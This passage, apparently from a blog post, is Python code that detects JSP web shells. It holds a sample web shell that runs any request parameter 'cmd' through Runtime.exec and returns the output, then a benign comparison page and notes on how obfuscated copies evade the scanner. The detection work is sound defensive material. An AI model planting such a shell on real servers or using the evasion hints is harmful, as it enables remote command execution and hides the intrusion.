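    public void run() {} } %>
<% String action = request.getParameter("action");
   String cmd = request.getParameter("cmd");
   if (action.equals("shell")) {
       Process child = Runtime.getRuntime().exec(cmd);
       InputStream in = child.getInputStream(); int c;
       while ((c = in.read()) != -1) out.print((char) c);
   } %>'''

# Constructed sample: a benign page that only echoes a parameter.
BENIGN_SAMPLE = r'''<%@ page contentType="text/html" %>
<% String name = request.getParameter("name"); %>
<html><body>Hello, <%= name == null ? "guest" : name %></body></html>'''


if __name__ == "__main__":
    for label, src in (("webshell", WEBSHELL_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, is_webshell(src), scan_jsp(src))
```

This catches the shell as published; a copy that builds the class names from string fragments, reflects into Runtime, or hides the parameter read behind a helper will slip past it, so on a real host pair source matching like this with the network evidence the page itself hands you: a servlet container process listening on an unexpected high port (myPort) or holding an outbound connection to port 23 of an internal host.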

Please credit the original address when reposting: https://www.9cbs.com/read-99469.html
